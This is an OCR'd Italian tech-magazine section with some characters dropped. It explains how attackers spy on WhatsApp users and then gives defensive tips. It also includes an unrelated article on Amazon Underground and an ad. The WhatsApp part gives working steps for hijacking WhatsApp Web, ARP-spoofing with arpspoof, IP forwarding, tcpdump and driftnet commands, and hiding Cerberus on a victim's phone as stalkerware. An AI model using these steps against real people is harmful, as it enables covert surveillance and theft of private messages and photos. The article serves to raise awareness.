Quali sono i rischi per un utente che usa
WhatsApp, sia nella versione Web sia in quella per smartphone? O, per meglio dire, quali
sono i punti deboli di questa applicazione di
messaggistica istantanea? Innanzitutto, un
problema tecnico dato dallassenza di un
sistema valido di crittograia sicura: i messaggi che inviamo su WhatsApp non vengono
infatti protetti in alcun modo (diversamente
da quanto accade invece con lapplicazione
concorrente Telegram, disponibile per Android,
iOS e Windows Phone) quindi un eventuale
malintenzionato che riesca ad intercettare le
nostre comunicazioni sar in grado di leggere
i messaggi. Ma il problema principale di tipo

psicologico e sociale: WhatsApp consente a


chiunque di contattare chiunque, permettendo
agli utenti di riconoscersi soltanto tramite il
numero telefonico. Questo avvantaggia i pirati,
che possono facilmente scoprire il numero
telefonico di una vittima e poi contattarla. E
svantaggia gli utenti, che non hanno molti
elementi per capire con chi stanno parlando:
naturalmente ci si dovrebbe insospettire qualora ricevessimo un messaggio da una persona o
da un numero telefonico che non conosciamo.
Ma gli utenti hanno spesso troppa iducia in
un sistema che appare sicuro e tendono ad accettare amicizie e contatti da chiunque, prima
ancora di veriicarne lidentit.

WHATSAPP WEB BASATO SU FINTI BIGLIETTI DA VISITA

Lutente clicca sul biglietto da visita contenente una


fotograia memorizzata come codice base64. Per non
una vera foto: il pirata ha inserito al suo posto il codice base64 del suo programma eseguibile.

Allapertura del biglietto vCard la inta fotograia viene


scaricata ed aperta sul computer dellutente. Tuttavia,
non apparir alcuna immagine: invece, il codice realizzato dal pirata verr eseguito dal sistema operativo.

Il programma del pirata in esecuzione, quindi pu


leggere lelenco dei ile personali dellutente, trovare la
cartella che contiene le immagini della Webcam, zipparla e inviarla via FTP al computer del pirata.
Speciali Win Magazine 93

Cos fa lhacker

| Fai da te | Cos ti spio WhatsApp! |

IL MODO PI SEMPLICE PER SPIARE LE CHAT SU WHATSAPP


Lintroduzione della versione Web del client
di messaggistica ha facilitato il compito agli
spioni. E purtroppo difendersi diventato pi
diicile. Tutti noi che usiamo WhatsApp siamo
dunque a rischio intercettazione e qualunque
malintenzionato, in poco tempo, pu prendere il
controllo del nostro account. Per farlo, gli basta
avere tra le mani lo smartphone della vittima
per alcuni secondi. Avvia quindi WhatsApp e, dal
menu Impostazioni, tappa su WhatsApp Web.

Sul suo computer si collega quindi al sito https://web.whatsapp.com e scannerizza con


lo smartphone della vittima, usando il lettore
integrato in WhatsApp stesso, il QR Code che
appare sul monitor.

Pu quindi rimettere a posto il telefono della vittima e leggere indisturbato le sue conversazioni.

La vittima, a questo punto, ha solo un modo per


accorgersi che qualcuno lo sta spiando e prendere le giuste contromisure: dal menu Impostazioni di WhatsApp
deve tappare di nuovo
su WhatsApp Web. Se
nella schermata che
appare risultano computer connessi che non
sono i suoi, deve immediatamente tappare su
Disconnetti da tutti i
computer.

Cos intercettano le nostre chat


Se il pirata si trova nella nostra stessa rete Wi-Fi pu intercettare tutto il trafico Internet, compreso quello
delle chat. Meglio usare lapp su reti protette con chiavi WPA e stare alla larga dalle reti pubbliche o aperte.

La vittima stata scelta

Per prima cosa, il pirata si procura un


sistema operativo progettato appositamente per il penetration testing, come Kali (www.
kali.org). Scaricata la ISO, la scrive su una pendrive con il programma Unetbootin (https://unetbootin.github.io). Il pirata avvia il proprio computer dalla pendrive USB di Kali e cerca di connettersi ad una rete Wi-Fi libera (od eventualmente cerca di bucarne una, se ha tanto tempo). Entrato nella rete, cerca una possibile vittima
e lancia il comando arpspoof -t 192.168.1.53
192.168.1.1.
94 Win Magazine Speciali

Aspirazione dati in corso

Nellesempio, 192.168.1.53 lindirizzo


della vittima, mentre 192.168.1.1 quello
del router. Con il comando precedente il pirata ha
diretto verso di se il trafico che va dalla vittima al
router. Ora deve fare il contrario aprendo un altro
terminale e scrivendo arpspoof -t 192.168.1.1
192.168.1.53. Il pirata deve ora aprire ancora
un altro terminale e dare il comando di inoltro
del trafico Internet: echo 1 > /proc/sys/net/ip_
forward. Grazie a questo, lutente vittima non si
accorger del furto di dati, continuando a navigare su Internet.

Ecco le chat e le foto

Il pirata pu finalmente aspirare tutto il trafico Internet della vittima, con il


comando tcpdump -i wlan0 -l -X che mette in
chiaro il testo dei pacchetti TCP che viaggiano
tra la vittima e il router, quindi anche i messaggi
di WhatsApp Web. Non solo: il pirata pu anche
vedere le immagini che lutente sta ricevendo o
inviando tramite un browser Web oppure tramite WhatsApp. Tutto ci che deve fare lanciare
il comando driftnet e una inestra apparir sullo
schermo del pirata, popolandosi con le immagini
della vittima!

Cos fa lhacker

| Cos ti spio WhatsApp! | Fai da te |

Cerberus al servizio dei pirati


Unapplicazione nata per conigurare un vero e proprio antifurto mobile e proteggere il proprio smartphone pu
diventare una arma a doppio taglio nella mani del pirata. Ecco in che modo.

Lapp sul Goo le Pla !

Lapplicazione che il pirata pu utilizzare per


spiare una vittima normalmente usata per
controllare il proprio smartphone in caso di furto. Quindi, per cominciare, il pirata deve mettere le mani sullo
smartphone della vittima, assicurarsi che sia rootato e
installare lapp Cerberus.

oni urazione truffaldina

Affinch Cerberus funzioni correttamente,


deve essere conigurato. Il pirata deve quindi
aprire lapp e seguire la procedura guidata. La prima
conigurazione da fare scegliere un indirizzo e-mail
ed una password per laccount Cerberus, poi si possono abilitare le funzioni da amministratore.

Cos ci ruba le foto

La funzione pi interessante, per il pirata che


vuole spiare le conversazioni di un utente,
il cattura foto automatica o anche lAutomatic photo capture. Qui importante modiicare il colore dello
schermo impostandolo a trasparente, per evitare che
lutente di accorga di qualcosa.

Il pirata si copre le spalle

Si possono poi abilitare delle funzioni aggiuntive, come il wipe da remoto, ovvero la possibilit di eliminare tutti i dati dello smartphone da remoto.
Questa opzione potrebbe essere utile per il pirata, per
non lasciare tracce dellinstallazione di Cerberus se
teme di essere scoperto.

Smartphone sotto controllo

Il pirata spunta lopzione Nascondi dalla lista


applicazioni, per evitare che lutente scopra
che lapp Cerberus installata sul proprio smartphone.
Pu poi connettersi al sito cerberusapp.com e accedere con il proprio indirizzo e-mail e la password allaccount creato al Passo 2.

Le nostre chat in chiaro

Selezionando il dispositivo da controllare,


il pirata deve solo scegliere lazione Grab
screenshot dallapposito menu a discesa. Allindirizzo e-mail associato allaccount Cerberus verr inviato lo screenshot attuale: se lutente sta utilizzando
Whatsapp, il pirata pu vedere la schermata.

LE 5 REGOLE DORO PER NON FARSI SPIARE SU WHATSAPP


Facendo tesoro delle tecniche di attacco del pirata analizzate nelle pagine precedenti, possiamo imparare
a prendere le giuste precauzioni per blindare il nostro account di messaggistica istantanea.

Usiamo sempre il buon senso! Come nella vita


reale, non idiamoci mai di utenti sconosciuti
che ci inviano messaggi e biglietti da visita sulla
versione Web di WhatsApp. Se ne riceviamo uno, non
apriamolo: casomai, proviamo prima a contattare il
mittente via chat per sincerarci della sua reale identit.
Ricordiamoci di tenere sempre aggiornato lantivirus sul nostro computer: eventuali ile infetti
inviatici come allegati di messaggi su WhatsApp Web
verranno individuati ed eliminati se ritenuti pericolosi.

Analogamente alle precauzioni da prendere con


le e-mail di phishing, quando usiamo WhatsApp
nella versione Web o app mobile, evitiamo di cliccare
eventuali pulsanti di segreteria che compaiono nei
messaggi. Lapp non ha una segreteria telefonica.
Aprendo il link potremmo inire su siti malevoli ed
essere invasi da virus di ogni genere.
Ricordiamoci sempre di attivare il blocco dello schermo sullo smartphone utilizzando una
password o un codice PIN: in questo modo, anche se

lasciamo incustodito il telefono, possiamo rendere la


vita pi diicile al pirata intenzionato a prenderne il
controllo per installare di nascosto app di controllo
da remoto come Cerberus.
Aggiorniamo sempre WhatsApp allultima versione: ad ogni upgrade, infatti, gli sviluppatori
correggono non solo eventuali malfunzionamenti
dellinterfaccia graica, ma anche falle di sicurezza
e aggiungono funzioni molto utili per proteggere
meglio la nostra privacy.

Speciali Win Magazine 95

Cos fa lhacker

| Fai da te | Fai incetta di app a costo zero |

Abbiamo testato in anteprima il nuovo store Amazon dal


quale poter scaricare gratis anche le app a pagamento

Cosa ci
occorre

15 MIN.
FACILE

APP ANDROID

Fai incetta di app


a costo zero
D

ecinedimigliaiadiappimprovvisamente gratuite: Amazon mette a segno un


altro piccolo colpo nel mondo della Internet Economy. La compagnia di Seattle che
ha rivoluzionato le-commerce, infatti, sferra un
gancio nel settore della telefonia mobile colpendo nientemeno che il Google Play Store! Il servizio concorrente messo a disposizione da Amazon, ovvero lAmazon App Store, viene affiancato dalla trovata, probabilmente rivoluzionaria,
Amazon Underground. Di cosa si tratta? Semplice: Amazon Underground, al momento attivo solo in USA, Francia, Regno Unito, Germania
e presto anche in Italia, uno store on-line che

permette di scaricare gratuitamente moltissime app che normalmente sarebbero a pagamento. Per far questo, sfrutta un accordo con
gli sviluppatori, i quali accettano di essere pagati da Amazon stesso in base ai minuti di utilizzo delle loro app.

I vantaggi per gli utenti


un po come applicare la logica dello streaming (pensiamo a Spotify o Deezer) al mercanto delle app mobile. Lautore non vende direttamente al fruitore, ma affida ad un
servizio che propone il tutto al cliente senza costi, e si ripaga con la pubblicit. un

AMAZON
UNDERGROUND
Quanto costa: Gratuita
Sito Internet:
https://amazon.com/
underground

processo che oramai, nel mondo della comunicazione, possiamo definire naturale: cos
come il passaggio dalla TV a canone alla TV
commerciale, dal noleggio dei film ai servizi streaming tipo Netflix, e dallacquisto dei
dischi al gi citato music streaming alla Spotify, quella di Amazon sar probabilmente la
mossa che, almeno nelle intenzioni, cercher di cambiare il sistema economico in cui
si muove, tutto a vantaggio del cliente-fruitore. Scaricare unapp da Amazon Underground sempre gratuito! Come vedremo
nellarticolo, bisogna recarsi sul sito da un dispositivo mobile e inserire la propria e-mail

Entriamo nel nuovo app store


Ecco come installare Amazon Underground sul nostro dispositivo portatile anche se non ancora disponibile
in Italia. Il trucco sta nellutilizzare una rete VPN creata con lapp TunnelBear VPN.

Installazione su misura

Dopo aver creato la VPN, andiamo su www.


amazon.com/underground dallo smartphone
e tappiamo Download Amazon Underground per
scaricare lAPK dellapp. Lo smartphone ci informa
che linstallazione bloccata: tappiamo Impostazioni
e attiviamo lopzione Origini sconosciute.

96 Win Magazine Speciali

Creiamo un nuovo account

Completiamo linstallazione e diamo le autorizzazioni per avviare lapp. Ci verr chiesto di


creare un account Amazon. Se ne abbiamo gi uno,
tappiamo Sign In ed effettuiamo laccesso, altrimenti creiamolo con Create an account: inseriamo le
nostre credenziali e scegliamo una password.

Un ne ozio alternativo

Finalmente possiamo entrare nello store


underground. Tappiamo su Your account
per personalizzare il proilo. Al termine, possiamo iniziare a cercare le app che ci interessano sfruttando
lapposito campo di ricerca indicato dalla lente di
ingrandimento e scaricandole accedendo al carrello.

| Fai incetta di app a costo zero | Fai da te |

per ricevere un link al download. Dopodich funziona esattamente come lApp Store e il Play Store: si entra, si esplora e si scaricano le app gratuitamente (e stiamo parlando di software che altrimenti arrivavano
a costare anche 60 dollari). Non solo le app
sono gratuite, ma anche gli aggiornamenti e i cosiddetti in-app purchases. Vengono
evitate anche le micro-transactions, insomma tutti quei modi in cui, durante lutilizzo di
unapp, a volte ci si trova a dover pagare per
sbloccare contenuti e funzionalit.

LE MIGLIORI APP CHE TROVI SU AMAZON UNDERGROUND


Ecco una piccola panoramica delloferta disponibile sullo store alternativo per quanto
riguarda le app che altrove sono disponibili solo a pagamento.
MSECURE PASSWORD MANAGER
Un manager per la sicurezza del nostro dispositivo tra i pi potenti sul mercato. La nostra
password non viene conservata da nessuna parte sul dispositivo. Le funzioni Auto Lock e
Password Generator fanno di mSecure Password Manager un software di protezione a prova
di spia. Infatti c anche lopzione autodistruzione del telefono: se non da 007 questo!
OFFICE SUITE PRO 8
Un clone di Microsoft Office con tutte le funzionalit e tutto il bundle bello e pronto sul
nostro dispositivo portatile. La versione PRO 8 non ci far rimpiangere il nostro computer.
Legge tutti i principali formati, esporta e importa PDF, foto, eccetera. C anche Excel. Cosa
vogliamo di pi? Fondamentalmente, come portarsi lufficio nella tasca dei pantaloni.

e per gli sviluppatori


Gli sviluppatori, a loro volta, possono informarsi circa i requisiti che la loro app deve avere per
essere listed su Amazon Underground, dalla pagina informativa www.winmagazine.it/
link/3254. In genere tutte le app sono candidabili per entrare nella famiglia Underground
e possono anche migrare da App Store e altri servizi. In particolare, il sito offre anche un
comodo sistema per calcolare una stima effettiva del profitto dellapp, in base allutilizzo medio giornaliero nei mesi precedenti alla
messa on-line sul servizio. Il report dei minuti
di utilizzo viene raccolto dal software stesso
sul telefonino e consegnato ad Amazon appena lo stesso si connette ad Internet, quindi lavora anche off-line. Esistono gi, come

Cos fa lhacker

I GIOCHI
Sono tantissimi, dal famoso Goat Simulator (un folle simulatore di capra che riscuote
successi tra gli amanti del videoludico) ai prodotti Disney come Duck Tales Remastered
e Mickey Mouse: Castle of Illusion. La scelta dei giochi su Amazon Underground
probabilmente finora la pi ampia. Consigliati per le lunghe attese dal dottore e sul treno.
PHOTOGRAPHY APP
Subito dopo i videogame, le app fotografiche seguono a ruota in quanto a popolarit.
Troviamo Photo Suite Pro 4, che uno dei pi completi per dispositivi mobili: Camera Zoom
FX Premium, diverse volte app dellanno su App Store e altri. Oppure il programma di
fotoritocco Perfectly Clear, vincitore del 2015 Hot One Award. Gratis e a portata di clic!

prevedibile, dei sistemi e dei tricks per aumentare il numero di minuti di utilizzo della
propria app: questo potrebbe portare ad una
serie di peggioramenti, nel lungo termine,
per quanto riguarda la fruibilit dei software

stessi, che potrebbero letteralmente diventare pi lenti e farraginosi per ragioni di profitto. Sono tanti effettivamente i pro e i contro
di questo tipo di operazioni, che sono sempre una scommessa.

APP, LIBRI, FILM, AUDIO: INIZIATA LERA DELLO STREAMING


Amazon Underground solo lultimo
di tutta una nuova generazione di
servizi che mirano a rendere i contenuti volatili. Un suo predecessore allinterno della stessa azienda
stato Kindle Unlimited, un servizio a
pagamento che permette, con 9,99
dollari al mese, di avere

accesso a pi di diecimila libri online in lingua inglese e francese. Gli


autori vengono retribuiti in base
al numero di pagine che il lettore
effettivamente visualizza. fondamentalmente un eBook Rental
Service (cio un servizio di noleggio dei libri elettronici), considerato
lo Spotify dei libri. Lo
stesso Spotify stato di
certo uno dei predecessori nellattuale questa
politica del contenuto
volatile, se
cos voglia-

mo chiamarla. Insieme a Netlix per


i ilm e ad altri servizi tipo Google
Play, Deezer, Tidal, YouTube Music,
Amazon Prime Music e altri per la
musica. Di servizi per lo streaming
se ne aggiungono quasi ogni mese
in tutto il mondo. Sono servizi che
mirano ad abolire completamente
il concetto di acquisto del prodotto
cercando di debellare una volta per
sempre la piaga della pirateria informatica. Funzionano? ancora presto
per dirlo. Quelli musicali, ovvero i
pionieri, Spotify su tutti, hanno tantissimi utilizzatori ma anche la loro

buona dose di detrattori, soprattutto


tra i musicisti e le etichette discograiche. Alcuni famosi musicisti, come
Taylor Swift, hanno deciso di ritirare i
loro album da Spotify perch efettivamente i guadagni (le cosiddette revenues, per usare un gergo tecnico)
sono estremamente ridotte e a volte
un artista si vede accreditare 0,001
ogni venti o trenta ascolti. Non
esattamente musica
commerciale!

Speciali Win Magazine 97

Cos fa lhacker

| Fai da te | Fai incetta di app a costo zero |

Cos pubblichiamo le nostre app


Siamo sviluppatori o semplici appassionati a cui piace smanettare con i dispositivi mobile? Ecco come fare per
pubblicare le nostre applicazioni su Amazon Underground ed avere anche una stima dei proitti.

La pagina principale

Sul nostro computer avviamo il browser predeinito e colleghiamoci alla home page del sito
Amazon dedicato agli sviluppatori: www.winmagazine.
it/link/3255. Qui possiamo trovare i link a tutti i passaggi che ci servono. Nella sezione Getting Started
clicchiamo here in Prepare Your App.

Serve il certiicato didoneit

Qui troviamo tutta la documentazione necessaria per veriicare se la nostra applicazioni avr
le chance di essere accettata dal servizio. Se abbiamo gi pubblicato lapp su un altro store, possiamo
importarla in Amazon Underground semplicemente
cliccando su Migration Requirements.

Prendiamo accordi

Compiliamo in ogni sua parte il modulo per


la registrazione, indicando anche una breve
descrizione dello sviluppatore (Developer description)
o della software house sviluppatrice. La sezione ci d
anche tutte le informazioni sui pagamenti e ci chieder
di caricare la nostra app in formato APK.

98 Win Magazine Speciali

Se la nostra app, invece, originale, torniamo alla pagina iniziale e clicchiamo su Register in Register for Free: verremo rimandati al form di
autenticazione dove potremo creare il nostro account
con I am a new customer o usare quello che gi
abbiamo cliccando I am a returning customer.

Testiamo la nostra app

Terminata la procedura di registrazione del


nostro account e della nostra app, possiamo
testarla sfruttando lambiente simulato messo a disposizione da Amazon Underground. Dalla pagina del test
clicchiamo Start Testing e carichiamo la nostra app in
formato APK cliccando Browse.

LA PRIVACY, QUESTA SCONOSCIUTA


Nella foto del box possiamo vedere il form
della privacy incriminato che sta facendo
discutere e storcere il naso a centinaia di
utilizzatori: come possiamo vedere, Amazon
richiede di accettare tutti i tipi di permessi
possibili in una volta sola, inclusi quelli pi
ambigui come inviare SMS, cambiare la
propriet dellaccount, registrare audio
ecc. Di base sembrerebbe essere semplicemente una accettazione preventiva relativa alle app che andremo a scaricare e
ai loro vari utilizzi: per anche vero che,
di fatto, stiamo irmando un contratto che
permette ad Amazon di fare tutte queste
cose a nome nostro

Creiamo laccount

Diventer ricco?

Se lapp supera il vaglio di Amazon, possiamo veriicare quanto potr renderci in termini
monetari. Per farlo, possiamo utilizzare il simulatore
disponibile su www.winmagazine.it/link/3256: inserendo i dati sugli utilizzi ottenuti dal test del passo precedente, vedremo la nostra stima di guadagno.

Come provare il servizio


in anteprima
Al momento in cui scriviamo, Amazon Underground non ancora attivo in Italia, ma
c un modo per provare il servizio in anteprima. Basta infatti installare sul nostro dispositivo mobile lapp TunnelBear VPN (disponibile sia per Android sia per iOS) che
permette di attivare una particolare rete
VPN (Virtual Private Network) veicolando
attraverso di essa tutto il traffico in transito sul dispositivo Android. In particolare, la VPN consente di collegarsi ai server
remoti (nel nostro caso quelli di Amazon
Underground) con un indirizzo IP non italiano superando di fatto eventuali blocchi
geografici.

Voglia di vacanza?
vai su TrovaViaggi.it!

Sei un operatore turistico


e vuoi promuovere la tua
struttura sul TrovaViaggi?
Fai conoscere la tua attivit a
pi di 10 milioni di viaggiatori!
Collegati a www.trovaviaggi.it
Clicca sul box Scopri il TrovaViaggi
Segui le istruzioni e in pochi click
la tua struttura sar online!

Il TrovaViaggi di Turistipercaso.it sempre pi ricco e ti offre la


possibilit di organizzare i tuoi viaggi scegliendo tra le migliori
Offerte Speciali e Last Minute proposte da Agenzie, Tour
Operator, Hotel, B&B e Agriturismi.
Migliaia di offerte di qualit
a prezzi imbattibili ti aspettano!

Scoprile su www.trovaviaggi.it

ASUS consiglia Windows.

$68652**/

GAMING WITHOUT LIMITS


ASUS ROG GL552 un notebook che grazie al processore Intel Core i7, alla scheda graca NVIDIA GTX960, al display Full HD IPS ed
al sistema operativo Windows 10, in grado di esprimere prestazioni superlative. Il suo look dinamico e aggressivo si ispira al design
del cacciabombardiere F-22 Raptor ed pensato per i veri professionisti del gaming: scocca con inserto in alluminio spazzolato, tasti
retroilluminati di rosso intenso con corsa di soli 1,8 millimetri, tutto stato ben progettato per unesperienza di utilizzo veramente unica. Lo
storage combinato SSD con HDD garantisce unelevata velocit di accesso ai dati ed unampia capacit di archiviazione, mentre lesclusivo
software GameFirst III ottimizza la connettivit per giocare davvero senza limiti.
Un notebook ASUS un investimento sicuro! In caso
di guasti entro i primi 12 mesi sar riparato gratuitamente
e riceverai un indennizzo pari al prezzo di acquisto.
Per tutti i dettagli visita: www.latuagaranzia.com
Valida per acquisti entro il 31/12/2015

Вам также может понравиться